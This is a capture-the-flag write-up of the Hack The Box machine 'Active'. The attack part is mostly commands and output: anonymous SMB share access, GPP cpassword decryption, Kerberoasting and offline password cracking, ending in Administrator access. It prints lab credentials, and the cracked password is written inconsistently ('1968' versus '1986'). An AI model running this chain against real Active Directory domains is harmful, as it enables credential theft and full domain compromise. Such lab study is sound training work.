nihilist - 28 / 11 / 19

Active Writeup

Introduction :

Active is an easy Windows box released back in July 2018.

Part 1 : Initial Enumeration

As always we begin our Enumeration using Nmap to enumerate opened ports.
We will be using the -F flag in order to enumerate the opened ports quickly.

  λ nihilist [ ] [ ~ ]
  → nmap -F
  Starting Nmap 7.80 ( ) at 2019-11-28 10:28 CET
  Nmap scan report for
  Host is up (0.079s latency).
  Not shown: 89 closed ports
  53/tcp    open  domain
  88/tcp    open  kerberos-sec
  135/tcp   open  msrpc
  139/tcp   open  netbios-ssn
  389/tcp   open  ldap
  445/tcp   open  microsoft-ds
  49152/tcp open  unknown
  49153/tcp open  unknown
  49154/tcp open  unknown
  49155/tcp open  unknown
  49157/tcp open  unknown

  Nmap done: 1 IP address (1 host up) scanned in 0.42 seconds

We are going to take a closer look at the ports 53, 80, 135, 139, 389, 445, using the flags -sC for default scripts and -sV to enumerate versions.

  λ nihilist [ ] [ ~ ]
  → nmap -sC -sV -Pn -p 53,88,135,139,389,445
  Starting Nmap 7.80 ( ) at 2019-11-28 10:29 CET
  Nmap scan report for
  Host is up (0.086s latency).

  53/tcp  open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
  | dns-nsid:
  |_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
  88/tcp  open  kerberos-sec  Microsoft Windows Kerberos (server time: 2019-11-28 09:30:01Z)
  135/tcp open  msrpc         Microsoft Windows RPC
  139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
  389/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
  445/tcp open  microsoft-ds?
  Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

  Host script results:
  |_clock-skew: 17s
  | smb2-security-mode:
  |   2.02:
  |_    Message signing enabled and required
  | smb2-time:
  |   date: 2019-11-28T09:30:07
  |_  start_date: 2019-11-28T09:25:41

  Service detection performed. Please report any incorrect results at .
  Nmap done: 1 IP address (1 host up) scanned in 20.66 seconds

Part 2 : Getting User Access

To enumerate the SMB Shares we'll be working with, we will use the enum4linux tool.

  λ nihilist [ ] [ ~ ]
→ enum4linux
Starting enum4linux v0.8.9 ( ) on Thu Nov 28 10:52:05 2019

|    Target Information    |
Target ...........
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

|    Enumerating Workgroup/Domain on    |
Cant load /etc/samba/smb.conf - run testparm to debug it
[E] Cant find workgroup/domain

|    Nbtstat Information for    |
Cant load /etc/samba/smb.conf - run testparm to debug it
Looking up status of
No reply from

|    Session Check on    |
Use of uninitialized value $global_workgroup in concatenation (.) or string at /bin/enum4linux line 437.
[+] Server allows sessions using username '', password ''
Use of uninitialized value $global_workgroup in concatenation (.) or string at /bin/enum4linux line 451.
[+] Got domain/workgroup name:

|    Getting domain SID for    |
Use of uninitialized value $global_workgroup in concatenation (.) or string at /bin/enum4linux line 359.
Unable to initialize messaging context
rpcclient: Cant load /etc/samba/smb.conf - run testparm to debug it
[+] Cant determine if host is part of domain or part of a workgroup

|    OS information on    |
Use of uninitialized value $global_workgroup in concatenation (.) or string at /bin/enum4linux line 458.
Use of uninitialized value $os_info in concatenation (.) or string at /bin/enum4linux line 464.
[+] Got OS info for from smbclient:
Use of uninitialized value $global_workgroup in concatenation (.) or string at /bin/enum4linux line 467.
[+] Got OS info for from srvinfo:
Unable to initialize messaging context
rpcclient: Cant load /etc/samba/smb.conf - run testparm to debug it

|    Users on    |
Use of uninitialized value $global_workgroup in concatenation (.) or string at /bin/enum4linux line 866.
Use of uninitialized value $users in print at /bin/enum4linux line 874.
Use of uninitialized value $users in pattern match (m//) at /bin/enum4linux line 877.

Use of uninitialized value $global_workgroup in concatenation (.) or string at /bin/enum4linux line 881.
Use of uninitialized value $users in print at /bin/enum4linux line 888.
Use of uninitialized value $users in pattern match (m//) at /bin/enum4linux line 890.

|    Share Enumeration on    |
Use of uninitialized value $global_workgroup in concatenation (.) or string at /bin/enum4linux line 640.
Unable to initialize messaging context
smbclient: Cant load /etc/samba/smb.conf - run testparm to debug it
do_connect: Connection to failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share
	Replication     Disk
	SYSVOL          Disk      Logon server share
	Users           Disk
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available

[+] Attempting to map shares on
Use of uninitialized value $global_workgroup in concatenation (.) or string at /bin/enum4linux line 654.
//$	Mapping: DENIED, Listing: N/A
Use of uninitialized value $global_workgroup in concatenation (.) or string at /bin/enum4linux line 654.
//$	Mapping: DENIED, Listing: N/A
Use of uninitialized value $global_workgroup in concatenation (.) or string at /bin/enum4linux line 654.
//$	Mapping: OK	Listing: DENIED
Use of uninitialized value $global_workgroup in concatenation (.) or string at /bin/enum4linux line 654.
//	Mapping: DENIED, Listing: N/A
Use of uninitialized value $global_workgroup in concatenation (.) or string at /bin/enum4linux line 654.
//	Mapping: OK, Listing: OK
Use of uninitialized value $global_workgroup in concatenation (.) or string at /bin/enum4linux line 654.
//	Mapping: DENIED, Listing: N/A
Use of uninitialized value $global_workgroup in concatenation (.) or string at /bin/enum4linux line 654.
//	Mapping: DENIED, Listing: N/A

|    Password Policy Information for    |
[E] Unexpected error from polenum:
Traceback (most recent call last):
  File "/usr/bin/polenum", line 16, in 
    from impacket.dcerpc.v5.rpcrt import DCERPC_v5
Use of uninitialized value $global_workgroup in concatenation (.) or string at /bin/enum4linux line 501.
ImportError: No module named impacket.dcerpc.v5.rpcrt
[+] Retieved partial password policy with rpcclient:

|    Groups on    |
Use of uninitialized value $global_workgroup in concatenation (.) or string at /bin/enum4linux line 542.

[+] Getting builtin groups:

[+] Getting builtin group memberships:
Use of uninitialized value $global_workgroup in concatenation (.) or string at /bin/enum4linux line 542.

[+] Getting local groups:

[+] Getting local group memberships:
Use of uninitialized value $global_workgroup in concatenation (.) or string at /bin/enum4linux line 593.

[+] Getting domain groups:

[+] Getting domain group memberships:

|    Users on via RID cycling (RIDS: 500-550,1000-1050)    |
Use of uninitialized value $global_workgroup in concatenation (.) or string at /bin/enum4linux line 710.
Use of uninitialized value $global_workgroup in concatenation (.) or string at /bin/enum4linux line 710.
Use of uninitialized value $global_workgroup in concatenation (.) or string at /bin/enum4linux line 710.
Use of uninitialized value $global_workgroup in concatenation (.) or string at /bin/enum4linux line 710.
Use of uninitialized value $global_workgroup in concatenation (.) or string at /bin/enum4linux line 710.
Use of uninitialized value $global_workgroup in concatenation (.) or string at /bin/enum4linux line 710.
Use of uninitialized value $global_workgroup in concatenation (.) or string at /bin/enum4linux line 710.
Use of uninitialized value $global_workgroup in concatenation (.) or string at /bin/enum4linux line 742.

|    Getting printer info for    |
Use of uninitialized value $global_workgroup in concatenation (.) or string at /bin/enum4linux line 991.
Unable to initialize messaging context
rpcclient: Cant load /etc/samba/smb.conf - run testparm to debug it

enum4linux complete on Thu Nov 28 10:53:01 2019

We seem to have access to the Replication Share, so we will navigate to it in order to see what we can work with.

λ root [ ] [/home/nihilist] → smbclient -N -U "" //
Unable to initialize messaging context
smbclient: Cant load /etc/samba/smb.conf - run testparm to debug it
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Jul 21 12:37:44 2018
  ..                                  D        0  Sat Jul 21 12:37:44 2018
  active.htb                          D        0  Sat Jul 21 12:37:44 2018

		10459647 blocks of size 4096. 4931286 blocks available
smb: \> cd active.htb
smb: \active.htb\> ls
  .                                   D        0  Sat Jul 21 12:37:44 2018
  ..                                  D        0  Sat Jul 21 12:37:44 2018
  DfsrPrivate                       DHS        0  Sat Jul 21 12:37:44 2018
  Policies                            D        0  Sat Jul 21 12:37:44 2018
  scripts                             D        0  Wed Jul 18 20:48:57 2018

		10459647 blocks of size 4096. 4931286 blocks available
smb: \active.htb\> cd scripts
smb: \active.htb\scripts\> ls
  .                                   D        0  Wed Jul 18 20:48:57 2018
  ..                                  D        0  Wed Jul 18 20:48:57 2018

		10459647 blocks of size 4096. 4931286 blocks available
smb: \active.htb\scripts\> cd ..
smb: \active.htb\> cd DfsPrivate
cd \active.htb\DfsPrivate\: NT_STATUS_OBJECT_NAME_NOT_FOUND
smb: \active.htb\> ls
  .                                   D        0  Sat Jul 21 12:37:44 2018
  ..                                  D        0  Sat Jul 21 12:37:44 2018
  DfsrPrivate                       DHS        0  Sat Jul 21 12:37:44 2018
  Policies                            D        0  Sat Jul 21 12:37:44 2018
  scripts                             D        0  Wed Jul 18 20:48:57 2018

		10459647 blocks of size 4096. 4931286 blocks available
smb: \active.htb\> cd Policies
smb: \active.htb\Policies\> ls
  .                                   D        0  Sat Jul 21 12:37:44 2018
  ..                                  D        0  Sat Jul 21 12:37:44 2018
  {31B2F340-016D-11D2-945F-00C04FB984F9}      D        0  Sat Jul 21 12:37:44 2018
  {6AC1786C-016F-11D2-945F-00C04fB984F9}      D        0  Sat Jul 21 12:37:44 2018

		10459647 blocks of size 4096. 4931286 blocks available
smb: \active.htb\Policies\> cd {31B2F340-016D-11D2-945F-00C04FB984F9}
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\> ls
  .                                   D        0  Sat Jul 21 12:37:44 2018
  ..                                  D        0  Sat Jul 21 12:37:44 2018
  GPT.INI                             A       23  Wed Jul 18 22:46:06 2018
  Group Policy                        D        0  Sat Jul 21 12:37:44 2018
  MACHINE                             D        0  Sat Jul 21 12:37:44 2018
  USER                                D        0  Wed Jul 18 20:49:12 2018

		10459647 blocks of size 4096. 4931286 blocks available
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\> cd MACHINE
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\> ls
  .                                   D        0  Sat Jul 21 12:37:44 2018
  ..                                  D        0  Sat Jul 21 12:37:44 2018
  Microsoft                           D        0  Sat Jul 21 12:37:44 2018
  Preferences                         D        0  Sat Jul 21 12:37:44 2018
  Registry.pol                        A     2788  Wed Jul 18 20:53:45 2018

		10459647 blocks of size 4096. 4931286 blocks available
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\> cd Preferences
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\> ls
  .                                   D        0  Sat Jul 21 12:37:44 2018
  ..                                  D        0  Sat Jul 21 12:37:44 2018
  Groups                              D        0  Sat Jul 21 12:37:44 2018
		10459647 blocks of size 4096. 4931286 blocks available
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\> cd Groups
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> ls
  .                                   D        0  Sat Jul 21 12:37:44 2018
  ..                                  D        0  Sat Jul 21 12:37:44 2018
  Groups.xml                          A      533  Wed Jul 18 22:46:06 2018

		10459647 blocks of size 4096. 4931286 blocks available
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> get Groups.xml
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Groups.xml (1.6 KiloBytes/sec) (average 1.6 KiloBytes/sec)
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> exit

Opening up the groups.xml file we see that we have a hashed password to work with.

  λ root [ ] [nihilist/_HTB/Active] → cat Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/>

We seem to have a hashed password and a Username : SVC_TGS


We will be using the gpp-decrypt tool in order to decrypt the hashed password.

  λ root [ ] [nihilist/_HTB/Active] →  gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
  /usr/bin/gpp-decrypt:21: warning: constant OpenSSL::Cipher::Cipher is deprecated

And we now have the credentials SVC_TGS:GPPstillStandingStrong2k18 ! Let's see if we can login.

  λ root [ ] [nihilist/_HTB/Active] → smbclient -U svc_tgs //
Unable to initialize messaging context
smbclient: Can't load /etc/samba/smb.conf - run testparm to debug it
Enter WORKGROUP\svc_tgs's password:
Try "help" to get a list of possible commands.
smb: \> whoami
whoami: command not found
smb: \> id
id: command not found
smb: \> ls
  .                                  DR        0  Sat Jul 21 16:39:20 2018
  ..                                 DR        0  Sat Jul 21 16:39:20 2018
  Administrator                       D        0  Mon Jul 16 12:14:21 2018
  All Users                         DHS        0  Tue Jul 14 07:06:44 2009
  Default                           DHR        0  Tue Jul 14 08:38:21 2009
  Default User                      DHS        0  Tue Jul 14 07:06:44 2009
  desktop.ini                       AHS      174  Tue Jul 14 06:57:55 2009
  Public                             DR        0  Tue Jul 14 06:57:55 2009
  SVC_TGS                             D        0  Sat Jul 21 17:16:32 2018

		10459647 blocks of size 4096. 4924856 blocks available
smb: \> cd SVC_TGS
smb: \SVC_TGS\> ls
  .                                   D        0  Sat Jul 21 17:16:32 2018
  ..                                  D        0  Sat Jul 21 17:16:32 2018
  Contacts                            D        0  Sat Jul 21 17:14:11 2018
  Desktop                             D        0  Sat Jul 21 17:14:42 2018
  Downloads                           D        0  Sat Jul 21 17:14:23 2018
  Favorites                           D        0  Sat Jul 21 17:14:44 2018
  Links                               D        0  Sat Jul 21 17:14:57 2018
  My Documents                        D        0  Sat Jul 21 17:15:03 2018
  My Music                            D        0  Sat Jul 21 17:15:32 2018
  My Pictures                         D        0  Sat Jul 21 17:15:43 2018
  My Videos                           D        0  Sat Jul 21 17:15:53 2018
  Saved Games                         D        0  Sat Jul 21 17:16:12 2018
  Searches                            D        0  Sat Jul 21 17:16:24 2018

		10459647 blocks of size 4096. 4924856 blocks available
smb: \SVC_TGS\> cd Desktop
smb: \SVC_TGS\Desktop\> ls
  .                                   D        0  Sat Jul 21 17:14:42 2018
  ..                                  D        0  Sat Jul 21 17:14:42 2018
  user.txt                            A       34  Sat Jul 21 17:06:25 2018

		10459647 blocks of size 4096. 4924856 blocks available
smb: \SVC_TGS\Desktop\> get user.txt
getting file \SVC_TGS\Desktop\user.txt of size 34 as user.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \SVC_TGS\Desktop\> exit

λ root [ ] [nihilist/_HTB/Active] → cat user.txt

And that's it ! we have been able to log in as the user SVC_TGS and print out the user flag.

Part 3 : Getting Root Access

Earlier our nmap scan picked up the 88th port running the kerberos service. so we will run the python script

λ root [ ] [_HTB/Active/PyKerberoast] at  master ✔
→ python2 -a -b cn=users,dc=active,dc=htb -d active -u svc_tgs -p GPPstillStandingStrong2k18 > HASH.txt

λ root [ ] [_HTB/Active/PyKerberoast] at  master ✔
→ cat HASH.txt


now we have a ticket for the admin user ! we just need to run john in combination with rockyou.txt to find the password.

john -w=rockyou.txt HASH.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status

Ticketmaster1968 (?)

1g 0:00:00:39 DONE (2019-11-28 13:34) 0.02515g/s 265093p/s 265093c/s 265093C/s Tiffani1432..Tiago_18
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Now we have the Administrator password ! Let's try to login using our newly acquired credentials : Administrator:Ticketmaster1986

  λ root [ ] [nihilist/_HTB/Active] → smbclient -U administrator //
Unable to initialize messaging context
smbclient: Can't load /etc/samba/smb.conf - run testparm to debug it
Enter WORKGROUP\administrator's password:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  DR        0  Sat Jul 21 16:39:20 2018
  ..                                 DR        0  Sat Jul 21 16:39:20 2018
  Administrator                       D        0  Mon Jul 16 12:14:21 2018
  All Users                         DHS        0  Tue Jul 14 07:06:44 2009
  Default                           DHR        0  Tue Jul 14 08:38:21 2009
  Default User                      DHS        0  Tue Jul 14 07:06:44 2009
  desktop.ini                       AHS      174  Tue Jul 14 06:57:55 2009
  Public                             DR        0  Tue Jul 14 06:57:55 2009
  SVC_TGS                             D        0  Sat Jul 21 17:16:32 2018

		10459647 blocks of size 4096. 4924582 blocks available
smb: \> cd Administrator
smb: \Administrator\> ls
  .                                   D        0  Mon Jul 16 12:14:21 2018
  ..                                  D        0  Mon Jul 16 12:14:21 2018
  AppData                            DH        0  Mon Jul 16 12:14:15 2018
  Application Data                  DHS        0  Mon Jul 16 12:14:15 2018
  Contacts                           DR        0  Mon Jul 30 15:50:10 2018
  Cookies                           DHS        0  Mon Jul 16 12:14:15 2018
  Desktop                            DR        0  Mon Jul 30 15:50:10 2018
  Documents                          DR        0  Mon Jul 30 15:50:10 2018
  Downloads                          DR        0  Mon Jul 30 15:50:27 2018
  Favorites                          DR        0  Mon Jul 30 15:50:10 2018
  Links                              DR        0  Mon Jul 30 15:50:10 2018
  Local Settings                    DHS        0  Mon Jul 16 12:14:15 2018
  Music                              DR        0  Mon Jul 30 15:50:10 2018
  My Documents                      DHS        0  Mon Jul 16 12:14:15 2018
  NetHood                           DHS        0  Mon Jul 16 12:14:15 2018
  NTUSER.DAT                        AHS   524288  Mon Jul 30 19:21:29 2018
  ntuser.dat.LOG1                   AHS   262144  Thu Nov 28 11:26:05 2019
  ntuser.dat.LOG2                   AHS        0  Mon Jul 16 12:14:09 2018
  NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf    AHS    65536  Mon Jul 16 12:14:15 2018
  NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms    AHS   524288  Mon Jul 16 12:14:15 2018
  NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms    AHS   524288  Mon Jul 16 12:14:15 2018
  ntuser.ini                         HS       20  Mon Jul 16 12:14:15 2018
  Pictures                           DR        0  Mon Jul 30 15:50:10 2018
  PrintHood                         DHS        0  Mon Jul 16 12:14:15 2018
  Recent                            DHS        0  Mon Jul 16 12:14:15 2018
  Saved Games                        DR        0  Mon Jul 30 15:50:10 2018
  Searches                           DR        0  Mon Jul 30 15:50:10 2018
  SendTo                            DHS        0  Mon Jul 16 12:14:15 2018
  Start Menu                        DHS        0  Mon Jul 16 12:14:15 2018
  Templates                         DHS        0  Mon Jul 16 12:14:15 2018
  Videos                             DR        0  Mon Jul 30 15:50:10 2018

		10459647 blocks of size 4096. 4924582 blocks available
smb: \Administrator\> cd Desktop
smb: \Administrator\Desktop\> ls
  .                                  DR        0  Mon Jul 30 15:50:10 2018
  ..                                 DR        0  Mon Jul 30 15:50:10 2018
  desktop.ini                       AHS      282  Mon Jul 30 15:50:10 2018
  root.txt                            A       34  Sat Jul 21 17:06:07 2018

		10459647 blocks of size 4096. 4924582 blocks available
smb: \Administrator\Desktop\> get root.txt
getting file \Administrator\Desktop\root.txt of size 34 as root.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \Administrator\Desktop\> exit

λ root [ ] [nihilist/_HTB/Active] → cat root.txt

And that's it ! The credentials gave us access to the Administrator User, and therefore we have been able to print out the root flag.


Here we can see the progress graph :